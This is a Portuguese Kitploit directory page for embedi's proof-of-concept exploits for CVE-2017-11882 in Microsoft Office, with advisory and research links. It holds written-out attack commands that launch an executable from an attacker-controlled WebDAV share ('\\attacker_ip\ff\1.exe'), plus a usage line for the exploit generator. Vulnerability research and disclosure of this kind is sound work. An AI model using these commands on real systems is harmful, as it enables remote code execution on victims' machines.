Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-11882 — Exploits de prova de conceito para CVE-2017-11882 | Kitploit
Ferramentas/GitHubGitHub/embedi/cve-2017-11882
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubembedi/cve-2017-11882

CVE-2017-11882

Exploits de prova de conceito para CVE-2017-11882

Ver Repositório
494178há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Pesquisa: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Análise de patch: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

Demonstração de exploração PoC: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

webdav_exec CVE-2017-11882

Um PoC simples para CVE-2017-11882. Este exploit aciona o serviço WebClient para iniciar e executar um arquivo remoto de um servidor WebDav controlado pelo atacante. A razão pela qual essa abordagem pode ser útil é uma limitação no comprimento do comando executado. No entanto, com a ajuda do WebDav, é possível lançar um executável arbitrário controlado pelo atacante na máquina vulnerável. Este script cria um documento simples com vários objetos OLE. Esses objetos exploram CVE-2017-11882, o que resulta na execução sequencial de comandos.

O primeiro comando que aciona o início do serviço WebClient pode ser assim:

root@kitploit:~
cmd.exe /c start \\attacker_ip\ff

O caminho do binário controlado pelo atacante deve ser um caminho de rede UNC:

root@kitploit:~
\\attacker_ip\ff\1.exe

Uso

root@kitploit:~
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

Exemplo de exploit para CVE-2017-11882 (iniciando calc.exe como payload)

A pasta example contém um arquivo .rtf que explora a vulnerabilidade CVE-2017-11882 e executa a calculadora no sistema.

Baixar ferramenta